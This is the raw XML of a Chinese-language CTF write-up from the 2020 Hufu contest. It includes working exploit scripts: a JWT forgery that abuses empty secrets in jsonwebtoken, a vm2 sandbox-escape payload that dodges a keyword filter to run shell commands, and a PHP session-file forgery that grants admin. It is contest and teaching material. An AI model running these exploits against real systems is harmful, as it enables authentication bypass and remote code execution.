          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或许该用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> koa-static </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来处理静态文件</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="18"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> *  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>路径该怎么配置？不管了先填个根目录</w:t>
      </w:r>
      <w:r>
        <w:t>XD</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="18"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> */</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Songti SC" w:hAnsi="Songti SC" w:eastAsia="Songti SC"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Songti SC" w:hAnsi="Songti SC" w:eastAsia="Songti SC"/>
        </w:rPr>
        <w:t>利用 koa-static 错误配置的源码泄露获得源码，进行审计</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Songti SC" w:hAnsi="Songti SC" w:eastAsia="Songti SC"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Songti SC" w:hAnsi="Songti SC" w:eastAsia="Songti SC"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="6193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ongti SC" w:hAnsi="Songti SC" w:eastAsia="Songti SC"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Songti SC" w:hAnsi="Songti SC" w:eastAsia="Songti SC"/>
        </w:rPr>
        <w:t>5. 发现关键代码：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 xml:space="preserve">   const token = ctx.header.authorization || ctx.request.body.authorization || ctx.request.query.authorization;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 xml:space="preserve">   const sid = JSON.parse(Buffer.from(token.split('.')[1], 'base64').toString()).secretid;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 xml:space="preserve">   if(sid === undefined || sid === null || !(sid &lt; global.secrets.length &amp;&amp; sid &gt;= 0)) {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 xml:space="preserve">     throw new APIError('login error', 'no such secret id');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 xml:space="preserve">   }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 xml:space="preserve">   const secret = global.secrets[sid];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 xml:space="preserve">   const user = jwt.verify(token, secret, {algorithm: 'HS256'});</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Songti SC" w:hAnsi="Songti SC" w:eastAsia="Songti SC"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Songti SC" w:hAnsi="Songti SC" w:eastAsia="Songti SC"/>
        </w:rPr>
        <w:t xml:space="preserve">   发现可以用小数绕过 secretid 的限制，将 secret 置空。发现本题考点为利用 node 的 jsonwebtoken 库的已知缺陷：当 jwt secret 为空时，jsonwebtoken 会采用 algorithm none 进行解密</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Songti SC" w:hAnsi="Songti SC" w:eastAsia="Songti SC"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Songti SC" w:hAnsi="Songti SC" w:eastAsia="Songti SC"/>
        </w:rPr>
        <w:t>6. 伪造 secretid 为小数的 token，让 secret 成为 undefined，导致 algorithm 为 none 进而使用户变成 admin</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Songti SC" w:hAnsi="Songti SC" w:eastAsia="Songti SC"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Songti SC" w:hAnsi="Songti SC" w:eastAsia="Songti SC"/>
        </w:rPr>
        <w:t>脚本：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import jwt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import requests</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Songti SC" w:hAnsi="Songti SC" w:eastAsia="Songti SC"/>
              </w:rPr>
            </w:pP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base_url = "http://0.0.0.0:10087" # 题目地址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s = requests.Session()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res = s.post(base_url+'/api/register', data={"username": "hhh", "password": "hhh"})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token = jwt.encode({"secretid":0.333,"username":"admin","password":"admin"},algorithm="none",key="").decode('utf-8')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res = s.post(base_url+'/api/login', data={"username": "admin", "password": "admin", "authorization": token})</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Songti SC" w:hAnsi="Songti SC" w:eastAsia="Songti SC"/>
              </w:rPr>
            </w:pP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res = s.get(base_url+'/api/flag')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print(res.text)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-CN"/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:lang w:val="zh-CN"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="43" w:name="_Toc9205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:lang w:val="zh-CN"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>just_escape</w:t>
      </w:r>
      <w:bookmarkEnd w:id="43"/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t>1. 打开浏览器，检查 header，发现是后端是 express，说明 run.php 只是出题人的恶趣味</w:t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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="3362325"/>
            <wp:effectExtent l="0" t="0" r="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t>2. 运行代码 `run.php?code=Error().stack` 根据报错信息发现是 vm2 的沙盒逃逸问题</w:t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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="47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t>3. https://github.com/patriksimek/vm2/issues/225 搜索可得 vm2 最新沙盒逃逸 poc</w:t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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="593280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t xml:space="preserve">   但在直接使用时发现存在 waf：</w:t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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="159258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t>4. 探测 waf 发现程序过滤了以下关键字：</w:t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t>['for', 'while', 'process', 'exec', 'eval', 'constructor', 'prototype', 'Function', '+', '"','\'']</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Songti SC" w:hAnsi="Songti SC" w:eastAsia="Songti SC"/>
          <w:lang w:val="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Songti SC" w:hAnsi="Songti SC" w:eastAsia="Songti SC"/>
          <w:lang w:val="zh-CN"/>
        </w:rPr>
        <w:t>5. 绕过 waf，并根据 poc 改写 exp.py ，获取 flag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  <w:lang w:val="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Songti SC" w:hAnsi="Songti SC" w:eastAsia="Songti SC"/>
                <w:lang w:val="zh-CN"/>
              </w:rPr>
              <w:t>import requests</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Songti SC" w:hAnsi="Songti SC" w:eastAsia="Songti SC"/>
                <w:lang w:val="zh-CN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Songti SC" w:hAnsi="Songti SC" w:eastAsia="Songti SC"/>
                <w:lang w:val="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Songti SC" w:hAnsi="Songti SC" w:eastAsia="Songti SC"/>
                <w:lang w:val="zh-CN"/>
              </w:rPr>
              <w:t>base_url = "http://</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Songti SC" w:hAnsi="Songti SC" w:eastAsia="Songti SC"/>
                <w:lang w:val="zh-CN"/>
              </w:rPr>
              <w:t>x</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Songti SC" w:hAnsi="Songti SC" w:eastAsia="Songti SC"/>
                <w:lang w:val="zh-CN"/>
              </w:rPr>
              <w:t>"</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Songti SC" w:hAnsi="Songti SC" w:eastAsia="Songti SC"/>
                <w:lang w:val="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Songti SC" w:hAnsi="Songti SC" w:eastAsia="Songti SC"/>
                <w:lang w:val="zh-CN"/>
              </w:rPr>
              <w:t>url =  base_url + '/run.php?code=(()=%3E{%20TypeError[[`p`,`r`,`o`,`t`,`o`,`t`,`y`,`p`,`e`][`join`](``)][`a`]%20=%20f=%3Ef[[`c`,`o`,`n`,`s`,`t`,`r`,`u`,`c`,`t`,`o`,`r`][`join`](``)]([`r`,`e`,`t`,`u`,`r`,`n`,`%20`,`p`,`r`,`o`,`c`,`e`,`s`,`s`][`join`](``))();%20try{%20Object[`preventExtensions`](Buffer[`from`](``))[`a`]%20=%201;%20}catch(e){%20return%20e[`a`](()=%3E{})[`mainModule`][[`r`,`e`,`q`,`u`,`i`,`r`,`e`][`join`](``)]([`c`,`h`,`i`,`l`,`d`,`_`,`p`,`r`,`o`,`c`,`e`,`s`,`s`][`join`](``))[[`e`,`x`,`e`,`c`,`S`,`y`,`n`,`c`][`join`](``)](`cat%20flag`)[`toString`]();%20}%20})()'</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Songti SC" w:hAnsi="Songti SC" w:eastAsia="Songti SC"/>
                <w:lang w:val="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Songti SC" w:hAnsi="Songti SC" w:eastAsia="Songti SC"/>
                <w:lang w:val="zh-CN"/>
              </w:rPr>
              <w:t>response = requests.get(url)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Songti SC" w:hAnsi="Songti SC" w:eastAsia="Songti SC"/>
                <w:lang w:val="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Songti SC" w:hAnsi="Songti SC" w:eastAsia="Songti SC"/>
                <w:lang w:val="zh-CN"/>
              </w:rPr>
              <w:t>print(response.text)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44" w:name="_Toc7084_WPSOffice_Level2"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"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baby</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi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upload</w:t>
      </w:r>
      <w:bookmarkEnd w:id="44"/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解题思路：</w:t>
      </w:r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1. 利用download读取自己的session</w:t>
      </w:r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2. 发现session内容格式，得知session引起为php_binary</w:t>
      </w:r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3. 构造admin的session内容，利用attr和sha256拼接后缀的规则，进行bypass，往session目录上传sess文件</w:t>
      </w:r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4. 伪造session成为admin</w:t>
      </w:r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5. 利用attr的截断，去掉拼接的sha256后缀，达成任意文件名控制</w:t>
      </w:r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6. 成功创建success.txt文件，获取flag</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Songti SC" w:hAnsi="Songti SC" w:eastAsia="Songti SC"/>
          <w:lang w:val="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Songti SC" w:hAnsi="Songti SC" w:eastAsia="Songti SC"/>
          <w:lang w:val="zh-CN"/>
        </w:rPr>
        <w:t>解题脚本：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import requests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from io import BytesIO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import hashlib</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Songti SC" w:hAnsi="Songti SC" w:eastAsia="Songti SC"/>
              </w:rPr>
            </w:pP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target_url = "http://</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Songti SC" w:hAnsi="Songti SC" w:eastAsia="Songti SC"/>
              </w:rPr>
              <w:t>x</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Songti SC" w:hAnsi="Songti SC" w:eastAsia="Songti SC"/>
              </w:rPr>
              <w:t>.changame.ichunqiu.com/"</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Songti SC" w:hAnsi="Songti SC" w:eastAsia="Songti SC"/>
              </w:rPr>
            </w:pP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def ReadSession():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data = {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'attr':'.',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'direction':'download',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'filename':'sess_bd6cbb52f804cc7b52d4ca5339dbd4e0'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}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url = target_url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s = requests.get(url=url)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r = requests.post(url=url,data=data)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print r.content[len(s.content):]</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Songti SC" w:hAnsi="Songti SC" w:eastAsia="Songti SC"/>
              </w:rPr>
            </w:pP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def BeAdmin():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files = {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 xml:space="preserve">    "up_file": ("sess", BytesIO('\x08usernames:5:"admin";'))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}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data = {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'attr':'.',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'direction':'upload'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}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url = target_url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r = requests.post(url=url,data=data,files=files)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session_id = hashlib.sha256('\x08usernames:5:"admin";').hexdigest()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return session_id</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Songti SC" w:hAnsi="Songti SC" w:eastAsia="Songti SC"/>
              </w:rPr>
            </w:pP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def upload_success():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files = {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 xml:space="preserve">    "up_file": ("test", BytesIO('good job!'))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}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data = {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'attr':'success.txt',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'direction':'upload'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}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url = target_url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r = requests.post(url=url,data=data,files=files)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Songti SC" w:hAnsi="Songti SC" w:eastAsia="Songti SC"/>
              </w:rPr>
            </w:pP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print 'Now Guest PHPSESSION Content is:',ReadSession()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print 'PHPSESSID is:',BeAdmin()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print 'Now Upload Success.txt'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print '*'*50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upload_success()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php_session_id = BeAdmin()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cookies = {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ab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Songti SC" w:hAnsi="Songti SC" w:eastAsia="Songti SC"/>
              </w:rPr>
              <w:t>'PHPSESSID':php_session_id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}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url = target_url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s = requests.get(url)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r = requests.get(url=url,cookies=cookies)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print 'Now here is your flag!'</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Songti SC" w:hAnsi="Songti SC" w:eastAsia="Songti SC"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Songti SC" w:hAnsi="Songti SC" w:eastAsia="Songti SC"/>
              </w:rPr>
              <w:t>print r.content[len(s.content):]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Songti SC" w:hAnsi="Songti SC" w:eastAsia="Songti SC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ngti SC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pple Color Emoji">
    <w:altName w:val="Segoe Print"/>
    <w:panose1 w:val="00000000000000000000"/>
    <w:charset w:val="00"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="00000000" w:usb1="00000000" w:usb2="14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</w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:hint="eastAsia"/>
      </w:rPr>
      <w:t>2020数字中国创新大赛虎符网络安全赛道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D16A4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="098D16A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F3F15DB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0F3F15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18A0BB9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="118A0BB9"/>
    <w:lvl w:ilvl="0" w:tentative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1AD606A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="11AD60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85B0889"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="185B08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FB92E8F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1FB92E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0630EEA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="30630E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3261029C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="326102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4C9115AD"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4C9115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4EAB3F66"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4EAB3F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64B12D6B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="64B12D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7BA074F7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7BA074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7"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="5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B8E"/>
    <w:rsid w:val="00041528"/>
    <w:rsid w:val="000B1207"/>
    <w:rsid w:val="000D15FD"/>
    <w:rsid w:val="00105F83"/>
    <w:rsid w:val="001B65F7"/>
    <w:rsid w:val="001E01AF"/>
    <w:rsid w:val="002042B7"/>
    <w:rsid w:val="00236F17"/>
    <w:rsid w:val="002601AD"/>
    <w:rsid w:val="00281017"/>
    <w:rsid w:val="002C2BD6"/>
    <w:rsid w:val="002F6851"/>
    <w:rsid w:val="003033C3"/>
    <w:rsid w:val="00356267"/>
    <w:rsid w:val="00356AAD"/>
    <w:rsid w:val="003603A7"/>
    <w:rsid w:val="00366ABC"/>
    <w:rsid w:val="00371082"/>
    <w:rsid w:val="00392571"/>
    <w:rsid w:val="003B1430"/>
    <w:rsid w:val="003C685E"/>
    <w:rsid w:val="003E050D"/>
    <w:rsid w:val="0040036A"/>
    <w:rsid w:val="00416329"/>
    <w:rsid w:val="00433330"/>
    <w:rsid w:val="00441BA5"/>
    <w:rsid w:val="00447DE7"/>
    <w:rsid w:val="00467120"/>
    <w:rsid w:val="004971CA"/>
    <w:rsid w:val="004D4AB6"/>
    <w:rsid w:val="0052234D"/>
    <w:rsid w:val="00523127"/>
    <w:rsid w:val="005613E4"/>
    <w:rsid w:val="0059131C"/>
    <w:rsid w:val="005A4E39"/>
    <w:rsid w:val="005C02CE"/>
    <w:rsid w:val="005D3CB9"/>
    <w:rsid w:val="006012EA"/>
    <w:rsid w:val="00602909"/>
    <w:rsid w:val="006147A8"/>
    <w:rsid w:val="00621BDA"/>
    <w:rsid w:val="00626DC5"/>
    <w:rsid w:val="00663592"/>
    <w:rsid w:val="006701EC"/>
    <w:rsid w:val="0069252E"/>
    <w:rsid w:val="0069608B"/>
    <w:rsid w:val="006C3DEE"/>
    <w:rsid w:val="006D03AB"/>
    <w:rsid w:val="006D1399"/>
    <w:rsid w:val="006E21EE"/>
    <w:rsid w:val="006F58D4"/>
    <w:rsid w:val="00724CA4"/>
    <w:rsid w:val="00735F47"/>
    <w:rsid w:val="00775FCD"/>
    <w:rsid w:val="00795E03"/>
    <w:rsid w:val="00797795"/>
    <w:rsid w:val="007A3712"/>
    <w:rsid w:val="007F6FE8"/>
    <w:rsid w:val="008060A1"/>
    <w:rsid w:val="008067A1"/>
    <w:rsid w:val="00831076"/>
    <w:rsid w:val="0085686A"/>
    <w:rsid w:val="00861862"/>
    <w:rsid w:val="0087556D"/>
    <w:rsid w:val="00882D72"/>
    <w:rsid w:val="008A3A3F"/>
    <w:rsid w:val="008D3C14"/>
    <w:rsid w:val="008D6CD6"/>
    <w:rsid w:val="008E6447"/>
    <w:rsid w:val="0092542C"/>
    <w:rsid w:val="009E1936"/>
    <w:rsid w:val="009E6889"/>
    <w:rsid w:val="00A10EB2"/>
    <w:rsid w:val="00A13441"/>
    <w:rsid w:val="00A158D8"/>
    <w:rsid w:val="00A5782E"/>
    <w:rsid w:val="00A81329"/>
    <w:rsid w:val="00A864CA"/>
    <w:rsid w:val="00AA4B3C"/>
    <w:rsid w:val="00AD163D"/>
    <w:rsid w:val="00AE0F7F"/>
    <w:rsid w:val="00AE7C30"/>
    <w:rsid w:val="00AF7B8E"/>
    <w:rsid w:val="00B00C14"/>
    <w:rsid w:val="00B0331B"/>
    <w:rsid w:val="00B14821"/>
    <w:rsid w:val="00B53B32"/>
    <w:rsid w:val="00B549C0"/>
    <w:rsid w:val="00B651B7"/>
    <w:rsid w:val="00B75693"/>
    <w:rsid w:val="00C22616"/>
    <w:rsid w:val="00C23B24"/>
    <w:rsid w:val="00C322D4"/>
    <w:rsid w:val="00C43180"/>
    <w:rsid w:val="00C535A7"/>
    <w:rsid w:val="00C672AC"/>
    <w:rsid w:val="00C9029D"/>
    <w:rsid w:val="00C9554B"/>
    <w:rsid w:val="00C96245"/>
    <w:rsid w:val="00CB1FCF"/>
    <w:rsid w:val="00CB45CA"/>
    <w:rsid w:val="00CB794F"/>
    <w:rsid w:val="00CC5202"/>
    <w:rsid w:val="00CF624D"/>
    <w:rsid w:val="00D0371F"/>
    <w:rsid w:val="00D041C2"/>
    <w:rsid w:val="00D224F1"/>
    <w:rsid w:val="00D30427"/>
    <w:rsid w:val="00D46059"/>
    <w:rsid w:val="00D83B12"/>
    <w:rsid w:val="00D86341"/>
    <w:rsid w:val="00DF198D"/>
    <w:rsid w:val="00E00BE5"/>
    <w:rsid w:val="00E1694C"/>
    <w:rsid w:val="00E2353E"/>
    <w:rsid w:val="00E23735"/>
    <w:rsid w:val="00E73939"/>
    <w:rsid w:val="00EA6821"/>
    <w:rsid w:val="00EC1E52"/>
    <w:rsid w:val="00ED544E"/>
    <w:rsid w:val="00F105D7"/>
    <w:rsid w:val="00F27C47"/>
    <w:rsid w:val="00F318CC"/>
    <w:rsid w:val="00F364B9"/>
    <w:rsid w:val="00F973A0"/>
    <w:rsid w:val="012A02F4"/>
    <w:rsid w:val="057F6D18"/>
    <w:rsid w:val="0F9E0F41"/>
    <w:rsid w:val="10CA6197"/>
    <w:rsid w:val="2B980D17"/>
    <w:rsid w:val="348E676B"/>
    <w:rsid w:val="35D63761"/>
    <w:rsid w:val="3B272737"/>
    <w:rsid w:val="3CD559F7"/>
    <w:rsid w:val="47251080"/>
    <w:rsid w:val="4E6F1581"/>
    <w:rsid w:val="60EF1C64"/>
    <w:rsid w:val="6590466D"/>
    <w:rsid w:val="7B620997"/>
    <w:rsid w:val="7F0D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8">
    <w:name w:val="Default Paragraph Font"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0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Heading 1 Char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HTML Preformatted Char"/>
    <w:basedOn w:val="8"/>
    <w:link w:val="6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token"/>
    <w:basedOn w:val="8"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="17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18">
    <w:name w:val="Quote"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:link w:val="19"/>
    <w:qFormat/>
    <w:uiPriority w:val="29"/>
    <w:pPr>
      <w:widowControl/>
      <w:spacing w:before="200" w:after="160"/>
      <w:ind w:left="864" w:right="864"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
      <w:kern w:val="0"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="zh-CN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9">
    <w:name w:val="Quote Char"/>
    <w:basedOn w:val="8"/>
    <w:link w:val="18"/>
    <w:qFormat/>
    <w:uiPriority w:val="29"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
      <w:kern w:val="0"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="zh-CN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d31ca15-2adb-48c3-826b-257ab51bea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31ca15-2adb-48c3-826b-257ab51bea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4d46bf3-613c-4f20-822c-9e23e61e75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d46bf3-613c-4f20-822c-9e23e61e75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e632b7-a582-424a-bb9a-b9af65428f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e632b7-a582-424a-bb9a-b9af65428f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9a51a9-2944-43eb-a35d-66ecd44f96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9a51a9-2944-43eb-a35d-66ecd44f96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43fe4d-2142-4f78-aabd-d4d6ebeb7f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43fe4d-2142-4f78-aabd-d4d6ebeb7f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85a03a-554b-48ea-9242-465760e3b5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85a03a-554b-48ea-9242-465760e3b5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caf6f4-acd6-40fe-8ed5-ad1287f9ec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caf6f4-acd6-40fe-8ed5-ad1287f9ec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27e24d-e20e-4bf2-b930-542f47c4aa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27e24d-e20e-4bf2-b930-542f47c4aa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dfaf04-57fc-4069-af0e-0fe63190ab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dfaf04-57fc-4069-af0e-0fe63190ab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9777fe-e6ce-4f54-a6a5-1b359b8512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9777fe-e6ce-4f54-a6a5-1b359b8512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08a062d-d24f-4c72-94e7-a99bdce82e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08a062d-d24f-4c72-94e7-a99bdce82e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ea3b9b-0669-4fb7-a098-4a15c1aa0f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ea3b9b-0669-4fb7-a098-4a15c1aa0f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dc2d72-6981-4bdc-8556-3801d6e43f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dc2d72-6981-4bdc-8556-3801d6e43f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588007-face-42c5-af36-a3e715e43c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588007-face-42c5-af36-a3e715e43c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cd709e-d140-4759-bfb5-30d7733100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cd709e-d140-4759-bfb5-30d7733100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5b2da4-2517-48aa-88cb-9ad945d1f4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5b2da4-2517-48aa-88cb-9ad945d1f4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68cd33-803c-4373-8111-517074a2e3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68cd33-803c-4373-8111-517074a2e3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57852c-0a64-42eb-90b1-902c024909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57852c-0a64-42eb-90b1-902c024909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37ba896-55c3-4f1b-acd3-0029dcfec2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7ba896-55c3-4f1b-acd3-0029dcfec2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39e09a-6e59-4d0f-baeb-5e6149346d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39e09a-6e59-4d0f-baeb-5e6149346d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1da6eb-5ef3-427e-a1f1-e67c7b37e1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1da6eb-5ef3-427e-a1f1-e67c7b37e1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2f5868-c22f-4518-9850-be6dd4ba8b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2f5868-c22f-4518-9850-be6dd4ba8b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181</Pages>
  <Words>35660</Words>
  <Characters>203266</Characters>
  <Lines>1693</Lines>
  <Paragraphs>476</Paragraphs>
  <TotalTime>99</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>238450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2020-04-20T03:52:00Z</dcterms:created>
  <dc:creator>蔡 增伟</dc:creator>
  <cp:lastModifiedBy>k</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-04-20T08:25:48Z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